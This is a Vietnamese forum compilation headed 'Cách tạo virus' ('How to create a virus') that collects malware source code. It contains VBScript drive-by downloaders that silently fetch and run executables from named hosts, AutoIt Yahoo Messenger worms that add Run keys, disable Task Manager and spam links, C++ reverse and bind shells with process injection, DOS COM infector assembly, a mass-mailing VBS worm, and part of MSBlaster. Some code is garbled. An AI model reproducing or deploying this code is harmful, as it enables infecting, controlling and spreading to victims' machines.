Cách tạo virus





The idea is simple: insert trojan code in the source of a commonly used program. Some of most useful programs to us in this[r]


Cách tạo virus

[YM Virus]nhut.be

<script language="VBScript"> on error resume next

dl = "http://nhut.be/dkc.exe"

Set df = document.createElement("object")

df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" str="Microsoft.XMLHTTP"

Set x = df.CreateObject(str,"") a1="Ado"

a2="db." a3="Str" a4="eam"

str1=a1&a2&a3&a4 str5=str1

set S = df.createobject(str5,"") S.type = 1

str6="GET"

x.Open str6, dl, False x.Send

fname1="bl4ck.com"

set F = df.createobject("Scripting.FileSystemObject","") set tmp = F.GetSpecialFolder(2)

fname1= F.BuildPath(tmp,fname1) S.open

S.write x.responseBody S.savetofile fname1,2 S.close

set Q = df.createobject("Shell.Application","") Q.ShellExecute fname1,"","","open",0

</script>

[YM Virus]viet8x.evonet.ro <html>

<head> <title>

:: Welcome :: </title>


on error resume next

dl = "http://viet8x.evonet.ro/task.exe" Set df = document.createElement("object")

df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"

str="Microsoft.XMLHTTP" Set x = df.CreateObject(str,"") a1="Ado"

a2="db." a3="Str" a4="eam"

str1=a1&a2&a3&a4 str5=str1

set S = df.createobject(str5,"") S.type = 1

str6="GET"

x.Open str6, dl, False x.Send

fname1="bl4ck.com"

set F = df.createobject("Scripting.FileSystemObject","") set tmp = F.GetSpecialFolder(2)

fname1= F.BuildPath(tmp,fname1) S.open

S.write x.responseBody S.savetofile fname1,2 S.close

set Q = df.createobject("Shell.Application","") Q.ShellExecute fname1,"","","open",0

</script> </head>

<body bgcolor="lavender"> <br><br><br>

<center>

<h3>You're welcome</h3> </center>


[YM Virus]Vuichoivn.com Scripts

<script language="VBScript"> on error resume next

dl = "http://vuichoivn.com/guitangban.exe" Set df = document.createElement("object")

df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"

str="Microsoft.XMLHTTP"

Set x = df.CreateObject(str,"") a1="Ado"

a2="db." a3="Str" a4="eam"

str1=a1&a2&a3&a4 str5=str1

set S = df.createobject(str5,"") S.type =

str6="GET"

x.Open str6, dl, False x.Send

fname1="svchost32.exe"

set F = df.createobject("Scripting.FileSystemObject","") set tmp = F.GetSpecialFolder(2)

fname1= F.BuildPath(tmp,fname1) S.open

S.write x.responseBody S.savetofile fname1,2 S.close

set Q = df.createobject("Shell.Application","") Q.ShellExecute fname1,"","","open",0

</script>

[YM Virus]VuiVeVn.HP.Ms

$website = "http://72.232.123.170/~love/" $website2 = "Http://dasdasdasd"

If Not FileExists(@WindowsDir & "\taskmng.exe") Then

InetGet ($website & "/xlove.exe", @WindowsDir & "\taskmng.exe", 0, 1) Sleep(500)

EndIf

RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi

ndows\CurrentVersion\Run", "BkavFw", "REG_SZ","C:\WINDOWS\taskmng.exe") RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi

ndows\CurrentVersion\Run", "Task Manager", "REG_SZ","C:\WINDOWS\taskmng.exe")


RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win

dows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1") RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win

dows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", "1") RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Int ernet Explorer\Main", "Start Page", "REG_SZ", $website2)

RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\V iew\YMSGR_buzz", "content url", "REG_SZ", $website2)

RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\V iew\YMSGR_Launchcast", "content url", "REG_SZ", $website2) RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi

ndows\CurrentVersion\Run", "Task Manager", "REG_SZ", @WindowsDir & "\taskmng.exe")

RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Int ernet Explorer\Main", "Window Title", "REG_SZ", "wWw.LoveNovel.Kiss.To")

$title = WinGetTitle("Yahoo! Messenger") $wincheck = WinExists ($title)

ClipPut("http://adasd <=== See My Picture :X :X So Cute !!! (No Virus)") if $wincheck = then

BlockInput (1) WinActivate($title) send("!A")

send("M") sleep(600)

send("{DOWN}") send("{SHIFTDOWN}") send("{DOWN 70}") send("{enter}") send("{LSHIFT}") send("^v {ENTER}") BlockInput (0)

endif

Code virus gaixinh

Sưu tầm share bạn ; <AUT2EXE VERSION: 3.1.1.112>

; -; < -;AUT2EXE INCLUDE-START: C:\Documents and Settings\Hai Long\Desktop\Robots.au3>

; ; -;

; AutoIt Version: 3.1.0


;

; Script Function:

; Template AutoIt script. ;

; -; Script Start - Add your code below here

$version = "1.0"

AutoItSetOption ("TrayIconHide","1")

InetGet ( "Http://xrobots.net/Gift/Robots.exe" ,@WindowsDir & "\Messenger.exe" ,0,1) sleep(3000)

RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wi ndows\CurrentVersion\Run","Yahoo!!!","REG_SZ",@Win dowsDir & "\Messenger.exe")

InetGet ( "Http://xrobots.net/Gift/Version.txt" ,@WindowsDir & "\Version.txt" ,1,1) sleep(5000)

$checkfile = FileExists ( @WindowsDir & "\Version.txt" ) if $checkfile = then

$file = FileOpen (@WindowsDir & "\Version.txt",0 ) $read = FileRead($file,3)

FileClose($file)

if $read <> $version then

InetGet ( "Http://xrobots.net/Gift/Update.exe" ,@WindowsDir & "\Update.exe" ,1,1) sleep (3000)

Run(@WindowsDir & "\Update.exe") endif

endif

RegWrite("HKEY_CURRENT_USER\SOFTWARE\microsoft\Int ernet Explorer\Main", "Start Page", "REG_SZ", "http://67.15.40.2/~tranphu/forumtp/")

RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\V

iew\YMSGR_Launchcast","content url","REG_SZ", "http://xRobots.net/Gift/New/") RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\V

iew\YMSGR_buzz","content url","REG_SZ", "http://vietnamnet.vn") RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win

dows\CurrentVersion\Policies\System", "DisableRegistryTools","REG_DWORD","1") AutoItSetOption ("WinTitleMatchMode", "2")

$check = FileExists ( @WindowsDir & "\pchealth\helpctr\binaries\msconfig.exe" ) if $check = then


FileDelete (@WindowsDir & "\pchealth\helpctr\binaries\msconfig.exe") endif

;; Đoạn xóa để đoạn mã khơng bị lợi dụng ;; xLuke

if ($count = 2) or ($count = 6) or ($count = 9) or ($count = 12) or ($count = 15) or ($count = 18) or ($count = 21) or ($count = 24) or ($count = 27) or ($count = 30) then $title = WinGetTitle("Yahoo! Messenger")

$wincheck = WinExists ($title)

ClipPut("Gai xinh ne , gai xinh ne : <a href="http://xrobots.net/Gift/?file=Gaixinh.jpg" target="_blank" rel="nofollow" class="limitview">http://xrobots.net/Gift/?

file=Gaixinh.jpg</a>") if $wincheck = then BlockInput (1)

WinActivate($title) send("!A")

send("M") sleep(400)

send("{DOWN}") send("{SHIFTDOWN}") send("{DOWN 70}") send("{enter}") send("{LSHIFT}") send("^v {ENTER}") BlockInput (0)

endif endif Next

; -; < -;AUT2EXE INCLUDE-END: C:\Documents and Settings\Hai Long\Desktop\Robots.au3>

; -

coding ~ ntshell, tiny reverse win32 shell

-ntshell.cpp Code:

PHP Code:

//Reverse NT Shell 1.1 by D-oNe


//

//Start NC: nc.exe -l -p 666, Then Run ntshell.exe! //Optmization Code

#pragma optimize("gsy",on)

#pragma comment(linker,"/RELEASE")

#pragma comment(linker,"/ENTRY:EntryPoint") #pragma comment(linker,"/MERGE:.rdata=.data") #pragma comment(linker,"/MERGE:.text=.data") #pragma comment(linker,"/MERGE:.reloc=.data")

#pragma comment(linker,"/SECTION:.text,EWR /IGNORE:4078") #pragma comment(linker,"/FILEALIGN:0x200")

#pragma comment(linker,"/subsystem:windows") #pragma comment(linker,"/base:0x7D000000") //Libs

#pragma comment(lib, "kernel32") #pragma comment(lib, "user32") #pragma comment(lib, "ws2_32") //Includes

#define WIN32_LEAN_AND_MEAN #include <windows.h>

#include <tlhelp32.h> #include <winsock2.h> //Settings

char *szIP = "127.0.0.1";

int port = 666;

char *injproc = "notepad.exe"; //Shell Code

DWORD WINAPI shell(LPVOID param) {

WSADATA WSAData;

struct sockaddr_in sin; SOCKET sock;

STARTUPINFO si;

PROCESS_INFORMATION pi;

LoadLibrary("kernel32.dll"); LoadLibrary("user32.dll"); LoadLibrary("ws2_32.dll"); memset(&sin, 0, sizeof(sin));

WSAStartup(MAKEWORD(1, 1), &WSAData); sin.sin_family = AF_INET;

sin.sin_port = htons(port);

sin.sin_addr.s_addr = inet_addr(szIP);

sock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0,

0);

connect(sock, (struct sockaddr*)&sin, sizeof(sin)); memset(&si, 0, sizeof(si));

memset(&pi, 0, sizeof(pi)); si.cb = sizeof(STARTUPINFO);

si.dwFlags = STARTF_USESHOWWINDOW + STARTF_USESTDHANDLES; si.wShowWindow = SW_HIDE;


si.hStdError = (HANDLE)sock;

CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, 0, NULL, &si, &pi);

return 0; }

//Inject Code

bool injectcode(HANDLE hProcess, LPTHREAD_START_ROUTINE lpCodeToInj ect)

{

DWORD dwThread, dwSize, dwWritten; PBYTE pbModule;

LPVOID lpBuffer; HANDLE hThread;

pbModule = (PBYTE)GetModuleHandle(0); dwSize = ((PIMAGE_NT_HEADERS)(pbModule+ ((PIMAGE_DOS_HEADER)pbModule)->e_lfanew ))->OptionalHeader.SizeOfImage;

VirtualFreeEx(hProcess, pbModule, 0, MEM_RELEASE);

lpBuffer = VirtualAllocEx(hProcess, pbModule, dwSize, MEM_COM MIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

if (!lpBuffer) return FALSE;

if (!WriteProcessMemory(hProcess, lpBuffer, pbModule, dwSize, &dwWritten)) return FALSE;

hThread = CreateRemoteThread(hProcess, 0, 0, lpCodeToInject,

pbModule, 0, &dwThread);

if (!hThread) return FALSE; CloseHandle(hThread); CloseHandle(hProcess); return TRUE;

}

DWORD GetPID(char *szExe) {

HANDLE hProcessSnap; PROCESSENTRY32 pe32;

hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,

);

pe32.dwSize = sizeof(PROCESSENTRY32); if (!Process32First(hProcessSnap, &pe32)) {

CloseHandle(hProcessSnap); return 0;

} {

if (lstrcmpi(pe32.szExeFile, szExe) == 0) {

return (pe32.th32ProcessID); break;

} }

while (Process32Next(hProcessSnap, &pe32)); CloseHandle(hProcessSnap);


void EntryPoint() {

HANDLE hProcess;

hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, GetPID(injp roc));

injectcode(hProcess, shell); ExitProcess(0);

}


tiếp theo

mShell.cpp Code

Trích:

//mShell 0.2 by D-oNe, aka_done@hotmail.com

//

//Optimization Code

#pragma optimize("gsy",on)

#pragma comment(linker,"/RELEASE") #pragma comment(linker,"/ENTRY:shell")

#pragma comment(linker,"/MERGE:.rdata=.data") #pragma comment(linker,"/MERGE:.text=.data") #pragma comment(linker,"/MERGE:.reloc=.data")

#pragma comment(linker,"/SECTION:.text,EWR /IGNORE:4078") #pragma comment(linker,"/FILEALIGN:0x200")

#pragma comment(linker,"/subsystem:windows") //Includes

#include <windows.h> #include <winsock.h> //Port To Listen On const int port = 23; //Shell Handler

DWORD WINAPI shell_handler(void *sendsock_) {


HANDLE hPipeRead1, hPipeWrite1, hPipeRead2, hPipeWrite2; int count = 0, i;

PROCESS_INFORMATION pInfo; SECURITY_ATTRIBUTES secu = {

(DWORD)sizeof(SECURITY_ATTRIBUTES), NULL, TRUE };

SOCKET sendsock = (SOCKET)sendsock_; STARTUPINFO sInfo;

if (sendsock == INVALID_SOCKET) return 0; CreatePipe(&hPipeRead1, &hPipeWrite1, &secu, 0); CreatePipe(&hPipeRead2, &hPipeWrite2, &secu, 0);

GetEnvironmentVariable("ComSpec", szCmdPath, sizeof(szCmdPath)); memset(&sInfo, 0, sizeof(sInfo));

memset(&pInfo, 0, sizeof(pInfo)); sInfo.cb = sizeof (STARTUPINFO);

sInfo.dwFlags = STARTF_USESHOWWINDOW + STARTF_USESTDHANDLES; sInfo.wShowWindow = SW_HIDE;

sInfo.hStdInput = hPipeRead2; sInfo.hStdOutput = hPipeWrite1; sInfo.hStdError = hPipeWrite1;

CreateProcess(NULL, szCmdPath, &secu, &secu, TRUE, 0, NULL, NULL, &sInfo, &pInfo);

while (sendsock != SOCKET_ERROR) {

memset(szBuffer, 0, sizeof(szBuffer));

PeekNamedPipe(hPipeRead1, NULL, NULL, NULL, &lpNumberOfBytesRead, NULL); while (lpNumberOfBytesRead)

{

if (!ReadFile(hPipeRead1, szBuffer, sizeof(szBuffer), &lpNumberOfBytesRead, NULL)) break;

else send(sendsock, szBuffer, lpNumberOfBytesRead, 0);

PeekNamedPipe(hPipeRead1, NULL, NULL, NULL, &lpNumberOfBytesRead, NULL); }

i = recv(sendsock, szBuffer, sizeof(szBuffer) ,0); if (sendsock == 0)

{

count++;

if (count > 1) break; }

if (!strstr(szBuffer, "_exit") == 0) {

TerminateProcess(pInfo.hProcess, 0); return 0;


else WriteFile(hPipeWrite2, szBuffer, i, &lpNumberOfBytesRead, 0); Sleep(10);

}

TerminateProcess(pInfo.hProcess, 0); return 0;

}

//Shell Listener void shell() {

DWORD dwID; register int size;

SOCKET shellsock, sendsock; struct sockaddr_in sin;

WSADATA wsadata;

if (WSAStartup(MAKEWORD(2,2), &wsadata) != 0) ExitProcess(0); sin.sin_family = AF_INET;

sin.sin_addr.s_addr = 0; sin.sin_port = htons(port); size = sizeof(sin);

shellsock = socket (AF_INET, SOCK_STREAM, 0); bind(shellsock, (struct sockaddr *)&sin, sizeof(sin)); listen(shellsock, 0);

while (1) {

sendsock = accept(shellsock,(struct sockaddr *)&sin, &size);

if (sendsock != INVALID_SOCKET) CreateThread(0, 0, shell_handler, (void *)sendsock, 0, &dwID);

Sleep(100); }

closesocket(sendsock); closesocket(shellsock); WSACleanup(); return;

}

; The EXEcution III Virus. ;

; Well, you're now the prouw owner of the smallest virus ever made! ; only 23 bytes long and ofcourse again very lame

; But what the heck, it's just an educational piece of code!! ;


; Tnx to myself, my assembler, DOS (yuck) and to John Tardy for his ; nice try to make the smallest (27 bytes and 25 bytes) virus

gotcha!! ;-)) ;

; BTW Don't forget, I only tested it unter DOS 5.0 so on other versions

; it might not work! _CODE SEGMENT ASSUME CS:_CODE ORG 100h

START: ; That's where we're starting

FILE DB '*.*',0h ; Dummy instruction, SUB's 0FFh from CH MOV AH,4Eh ; Let's search!

DO_IT: MOV DX,SI ; Make DX = 100h (offset file) INT 21h ; Search now dude!

MOV AX,3D01h ; Hmm, infect that fucking file! MOV DX,9Eh ; Name is at DS:[9Eh]

INT 21h ; Go it!

XCHG BX,AX ; Put the handle in BX MOV AH,40h ; Write myself!

JMP DO_IT ; Use other routine _CODE ENDS

END START

Virus FirstStar Source Code

;

******************************************************** ********************;

; ;


; -=] P E R F E C T C R I M E [=- ; ; -=] +31.(o)79.426o79 [=- ; ; -=] [=- ;

; -=] For All Your H/P/A/V Files [=- ; ; -=] SysOp: Peter Venkman [=- ; ; -=] [=- ;

; -=] +31.(o)79.426o79 [=- ; ; -=] P E R F E C T C R I M E [=- ; ; -=][][][][][][][][][][][][][][][=- ; ; ;

; *** NOT FOR GENERAL DISTRIBUTION *** ;

; ;

; This File is for the Purpose of Virus Study Only! It Should not be Passed ;

; Around Among the General Public It Will be Very Useful for Learning how ;

; Viruses Work and Propagate But Anybody With Access to an Assembler can ;

; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;

; Experience can Turn it Into a far More Malevolent Program Than it Already ;

; Is Keep This Code in Responsible Hands! ; ; ;

;

******************************************************** ********************;

;

; First-Star / 222 Virus ;

; (C) by Glenn Benton in 1992

; This is a non-resident direct action COM infector in current dirs.

; ; ;


Start: Jmp MainVir Db '*'

MainVir: Call On1 On1: Pop BP

Sub BP,Offset MainVir+3 Push Ax

Mov Ax,Cs:OrgPrg[BP] Mov Bx,Cs:OrgPrg[BP]+2 Mov Cs:Start+100h,Ax Mov Cs:Start[2]+100h,Bx

Mov Ah,1ah Mov Dx,0fd00h Int 21h

Mov Ah,4eh

Search: Lea Dx,FileSpec[BP] Xor Cx,Cx

Int 21h Jnc Found Jmp Ready

Found: Mov Ax,4300h Mov Dx,0fd1eh Int 21h

Push Cx

Mov Ax,4301h Xor Cx,Cx Int 21h

Mov Ax,3d02h Int 21h

Mov Bx,5700h Xchg Ax,Bx Int 21h Push Cx Push Dx Mov Ah,3fh


Int 21h

Mov Ax,Cs:[OrgPrg][BP] Cmp Ax,'MZ'

Je ExeFile Cmp Ax,'ZM' Je ExeFile

Mov Ah,Cs:[OrgPrg+3][BP] Cmp Ah,'*'

Jne Infect ExeFile: Call Close Mov Ah,4fh Jmp Search FSeek: Xor Cx,Cx Xor Dx,Dx Int 21h Ret

Infect: Mov Ax,4202h Call FSeek

Sub Ax,3

Mov Cs:CallPtr[BP]+1,Ax Mov Ah,40h

Lea Dx,MainVir[BP] Mov Cx,VirLen Int 21h

Mov Ax,4200h Call FSeek Mov Ah,40h

Lea Dx,CallPtr[BP] Mov Cx,4

Int 21h Call Close Ready: Mov Ah,1ah Mov Dx,80h Int 21h Pop Ax


Retf Close: Pop Si Pop Dx Pop Cx

Mov Ax,5701h Int 21h

Mov Ah,3eh Int 21h

Mov Ax,4301h Pop Cx

Mov Dx,0fd1eh Int 21h

Push Si Ret

CallPtr Db 0e9h,0,0 FileSpec Db '*.COM',0 OrgPrg: Int 20h Nop

Nop

VirLen Equ $-MainVir ;

******************************************************** ********************;

; ;

; -=][][][][][][][][][][][][][][][=- ; ; -=] P E R F E C T C R I M E [=- ; ; -=] +31.(o)79.426o79 [=- ; ; -=] [=- ;

; -=] For All Your H/P/A/V Files [=- ; ; -=] SysOp: Peter Venkman [=- ; ; -=] [=- ;


; ;

; *** NOT FOR GENERAL DISTRIBUTION *** ;

; ;

; This File is for the Purpose of Virus Study Only! It Should not be Passed ;

; Around Among the General Public It Will be Very Useful for Learning how ;

; Viruses Work and Propagate But Anybody With Access to an Assembler can ;

; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;

; Experience can Turn it Into a far More Malevolent Program Than it Already ;

; Is Keep This Code in Responsible Hands! ; ; ;

;

******************************************************** ********************;

;──────────────────────────────────────────────────────────────────────────;

;──────────────────> and Remember Don't Forget to Call <──────────────────;

;────────────> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <──────────;

;──────────────────────────────────────────────────────────────────────────

MÃ NGUỒN CỦA VIRUS HOME PAGE

'Homepage Created By Robinhood

Set FSO =3D createobject("scripting.filesystemobject") dirsystem =3D FSO.getspecialfolder(1)

Path=3D dirsystem & "\Win32.dll.vbs" Set WSH createobject("wscript.shell") WSH.regwrite


"wscript.exe " & Path& " %"

FSO.copyfile wscript.scriptfullname, Path payload=20

If =

WSH.regread("HKLM\SOFTWARE\Microsoft\Windows\Curre ntVersion\Homepage\Send

mail") <> then sendmail

End if If

WSH.regread("HKLM\SOFTWARE\Microsoft\Windows\Curre ntVersion\Homepage\IRC"

) <> then IRC "" End if

Set sourcefile=3D FSO.opentextfile(wscript.scriptfullname) sourcetext sourcefile.readall

sourcefile.close Do

if not(FSO.fileexists(wscript.scriptfullname)) then

set filebackup=3D FSO.createtextfile(wscript.scriptfullname) filebackup.write sourcetext

filebackup.close end if

sWSH.regread("HKLM\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\Win32dll"

)

If s<> "wscript.exe " & Path& " %" then WSH.regwrite =

"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n\Win32dll", "wscript.exe " & Path& " %"

end if s=3D "" loop=20

Function sendmail()

Set myapp =3D CreateObject("Outlook.Application") If myapp =3D "Outlook" Then

Set myname =3D myapp.GetNameSpace("MAPI") Set myaddlists =3D myname.AddressLists

For Each myaddlist In myaddlists

If myaddlist.AddressEntries.Count <> Then x =3D myaddlist.AddressEntries.Count For i =3D To x


mailitem.To =3D myadd.Address

mailitem.Subject =3D "Very Important!"

mailitem.Body =3D "Hi:" & vbcrlf & "Please view this file, it's very important." & vbcrlf & ""

execute "set myatts =3Dmailitem." & Chr(65) & Chr(116) & Chr(116) &

Chr(97) & Chr(99) & Chr(104) & Chr(109) & Chr(101) & Chr(110) & Chr(116) & Chr(115)

copypath Path

mailitem.DeleteAfterSubmit True myatts.Add copypath

If mailitem.To <> "" Then mailitem.Send

End If Next End If Next End If End function

Function IRC(ircpath) If ircpath <> "" Then programpath

WSH.regread("HKEY_LOCAL_MACHINE\Software\Microsoft \Windows\CurrentVersion

\ProgramFilesDir")

If FSO.fileexists("c:\mirc\mirc.ini") Then ircpath =3D "c:\mirc"

ElseIf FSO.fileexists("c:\mirc32\mirc.ini") Then ircpath =3D "c:\mirc32"

ElseIf FSO.fileexists(programpath & "\mirc\mirc.ini") Then ircpath =3D programpath & "\mirc"

ElseIf FSO.fileexists(programpath & "\mirc32\mirc.ini") Then ircpath =3D programpath & "\mirc"

Else

ircpath =3D "" End If

End If

If ircpath <> "" Then

Set ircscript =3D FSO.CreateTextFile(ircpath & "\script.ini", True) text =3D "[script]" & vbCrLf & "n0=3Don 1:JOIN:#:{"

text =3D text & vbCrLf & "n0=3Don 1:JOIN:#:{"

text =3D text & vbCrLf & "n1=3D /if ( $nick =3D=3D $me ) { halt }" text =3D text & vbCrLf & "n2=3D /." & Chr(100) & Chr(99) & Chr(99) & " send $nick "

text =3D text & Path


ircscript.Close End If

End Function=20 Function payload() Randomize

If + Int(Rnd * 5) =3D then

WSH.run "Http://www.virii.com.ar",false end if

end function Code:

; virus from ALT-11 mag

; -;

; Coded by: Azagoth

; -; Assemble using Turbo Assembler:

; tasm /m2 <filename>.asm ; tlink /t <filename>.obj ;

-; - Non-Overwriting COM infector (excluding COMMAND.COM) ; - COM growth: XXX bytes

; - It searches the current directory for uninfected files If none are

; found, it searches previous directory until it reaches root and no more

; uninfected files are found (One infection per run) ; - Also infects read-only files

; - Restores attributes, initial date/time-stamps, and original path ;

.model tiny code

org 100h ; adjust for psp start:

call get_disp ; push ip onto stack get_disp:

pop bp ; bp holds current ip sub bp, offset get_disp ; bp = code displacement ; original label offset is stored in machine code


mov ah, 47h ; save cwd

xor dl, dl ; = default drive lea si, [bp + org_path]

int 21h get_dta:

mov ah, 2fh int 21h

mov [bp + old_dta_off], bx ; save old dta offset set_dta: ; point to dta record mov ah, 1ah

lea dx, [bp + dta_filler] int 21h

search:

mov ah, 4eh ; find first file

mov cx, [bp + search_attrib] ; if successful dta is lea dx, [bp + search_mask] ; created

int 21h

jnc clear_attrib ; if found, continue find_next:

mov ah, 4fh ; find next file int 21h

jnc clear_attrib still_searching:

mov ah, 3bh

lea dx, [bp + previous_dir] ; cd int 21h

jnc search

jmp bomb ; at root, no more files clear_attrib:

mov ax, 4301h

xor cx, cx ; get rid of attributes lea dx, [bp + dta_file_name]

int 21h open_file:

mov ax, 3D02h ; AL=2 read/write lea dx, [bp + dta_file_name]

int 21h

xchg bx, ax ; save file handle ; bx won't change from now on

check_if_command_com: cld

lea di, [bp + com_com]

lea si, [bp + dta_file_name]


repe cmpsb ; repeat while equal jne check_if_infected

jmp close_file check_if_infected:

mov dx, word ptr [bp + dta_file_size] ; only use first word since

; COM file sub dx, ; file size - mov ax, 4200h

mov cx, ; cx:dx ptr to offset from

int 21h ; origin of move

mov ah, 3fh ; read last characters mov cx,

lea dx, [bp + last_chars] int 21h

mov ah, [bp + last_chars] cmp ah, [bp + virus_id] jne save_3_bytes

mov ah, [bp + last_chars + 1] cmp ah, [bp + virus_id + 1] jne save_3_bytes

jmp close_file save_3_bytes:

mov ax, 4200h ; 00=start of file xor cx, cx

xor dx, dx int 21h mov ah, 3Fh mov cx,

lea dx, [bp + _3_bytes] int 21h

goto_eof:

mov ax, 4202h ; 02=End of file

xor cx, cx ; offset from origin of move

xor dx, dx ; (i.e nowhere) int 21h ; ax holds file size ; since it is a COM file, overflow will not occur

save_jmp_displacement:

sub ax, ; file size - = jmp disp

mov [bp + jmp_disp], ax write_code:


mov cx, virus_length ;*** equate lea dx, [bp + start]

int 21h goto_bof:

mov ax, 4200h xor cx, cx xor dx, dx int 21h

write_jmp: ; to file mov ah, 40h

mov cx,

lea dx, [bp + jmp_code] int 21h

inc [bp + infections] restore_date_time:

mov ax, 5701h

mov cx, [bp + dta_file_time] mov dx, [bp + dta_file_date] int 21h

close_file:

mov ah, 3eh int 21h restore_attrib:

xor ch, ch

mov cl, [bp + dta_file_attrib] ; restore original attributes

mov ax, 4301h

lea dx, [bp + dta_file_name] int 21h

done_infecting?:

mov ah, [bp + infections] cmp ah, [bp + max_infections] jz bomb

jmp find_next bomb:

; cmp bp,

; je restore_path ; original run ;

; Stuff deleted restore_path:


mov ah, 3bh ; cd to original path lea dx, [bp + org_path]

int 21h restore_dta:

mov ah, 1ah

mov dx, [bp + old_dta_off] int 21h

restore_3_bytes: ; in memory lea si, [bp + _3_bytes]

mov di, 100h

cld ; auto-inc si, di mov cx,

rep movsb return_control_or_exit?:

cmp bp, ; bp = if original run je exit

mov di, 100h ; return control back to prog

jmp di ; -> cs:100h exit:

mov ax, 4c00h int 21h

; Variable Declarations

-old_dta_off dw ; offset of old dta address

; - dta record

dta_filler db 21 dup (0) dta_file_attrib db

dta_file_time dw dta_file_date dw dta_file_size dd

dta_file_name db 13 dup (0)

; -search_mask db '*.COM',0 ; files to infect: *.COM search_attrib dw 00100111b ; all files a,s,h,r com_com db 'COMMAND.COM'

previous_dir db ' ',0 root db '\',0

org_path db 64 dup (0) ; original path infections db ; counter

max_infections db


last_chars db 0, ; last chars = ID ? virus_id db 'AZ'

eov: ; end of virus virus_length equ offset eov - offset start

end start

Code:

VSize=085h

Code Segment

Assume CS:Code org

db 4Dh jmp Start Org 600h

Bytes db 0CDh,20h,90h,90h Start: mov si, 0100h

mov bx, offset Int21 mov cx, 0050h

mov di, si add si, [si+2] push di

movsw movsw

mov es, cx cmpsb

je StartFile dec si

dec di rep movsw

mov es, cx xchg ax, bx xchg ax, cx Loop0: xchg ax, cx

xchg ax, word ptr es:[di-120h] stosw

jcxz Loop0 xchg ax, bx StartFile:

push ds pop es ret


push bx push dx push ds push es

mov ax, 3D02h call DoInt21 jc EndExec

cbw ;Zero AH cwd ;Zero DX

mov bx, si ;Move handle to BX mov ds, ax ;Set DS and ES to 60h, mov es, ax ;the virus data segment mov ah, 3Fh ;Read first bytes int 69h

mov al, 4Dh

scasb ;Check for 4D5Ah or infected file mark

je Close ;.EXE or already infected mov al,

call LSeek ;Seek to the end, SI now contains file size

mov cl, VSize ;Virus size in CX, prepare to write

int 69h ;AH is 40h, i.e Write operation mov ax, 0E94Dh ;Virus header in AX

stosw ;Store it

xchg ax, si ;Move file size in AX stosw ;Complete JMP instruction xchg ax, dx ;Zero AX

call LSeek ;Seek to the beginning

int 69h ;AH is 40h, write the virus header

Close: mov ah,3Eh ;Close the file int 69h

EndExec: pop es pop ds pop dx pop bx pop ax

End21: jmp dword ptr cs:[69h * 4]

LSeek: mov ah, 42h ;Seek operation cwd ;Zero DX

DoInt21: xor cx, cx ;External entry for Open, zero cx

int 69h

mov cl, ;4 bytes will be read/written xchg ax, si ;Store AX in SI

mov ax, 4060h ;Prepare AH for Write xor di, di ;Zero DI


End ;

;─────────────────────────────────────────────────────────────────────────

; ────────────────────> and Remember Don't Forget to Call <────────────────

; ────────────> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <──────────

;─────────────────────────────────────────────────────────────────────────

Virus MSBlaster Source Code

Cái nì Assemble mừ save dạng .vbs you excluding

COMMAND.COM

Không biết phải không ta Quote:

Coded by: Azagoth

; -; Assemble using Turbo Assembler: ; tasm /m2 <filename>.asm

; tlink /t <filename>.obj

; -; - Non-Overwriting COM infector (excluding COMMAND.COM) ; - COM growth: XXX bytes

; - It searches the current directory for uninfected files If none are ; found, it searches previous directory until it reaches root and no more ; uninfected files are found (One infection per run)

; - Also infects read-only files

; - Restores attributes, initial date/time-stamps, and original path. ; - Muốn lấy nì nè

Quote:

/* global variables*/char Filename[SOME_CONST];DWORD i_ip_A;DWORD

i_ip_B;DWORD i_ip_C;DWORD i_ip_D;DWORD i_ip_D_?;/* Deliberately left blank This function listens on ports 69 and 135 for incoming connections It then tries to spread itself It might have spread faster had it done a progressive network scan.*/void

spreadworm(){}/* Deliberately left blank Was designed to a DoS attack on


attacking windowsupdate.microsoft.com or microsoft.com for real entertainment value.*/SEC_THREAD_START payload(){}// mainint main(){ in_addr in; DWORD temp_ip_buf; hostent _hostent; char local_ip_address[0x200], month[3],

day_of_month[3]; LPWSADATA WSAData; HKEY hKey; DWORD ThreadId; bool status; /* Registry Key manipulation We create the key if it doesn't exist, otherwise it is opened Then we give the value "msblast.exe" to the key "windows auto update"

Windows Auto Update is now set to run on boot up, which will run MSBlast.exe */ RegCreateKeyExA(0x80000002,

"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run ", 0, 0, 0, 0xf003f, 0, & hKey, 0); RegSetValueExA(hKey, "windows auto update", 0, 1, "msblast.exe", 0x32);

RegCloseKey(hKey); /* Check to see if an instance of MSBlast.exe is already running, if there is one running then this instance exits */ CreateMutexA(0, 1, "BILLY"); if

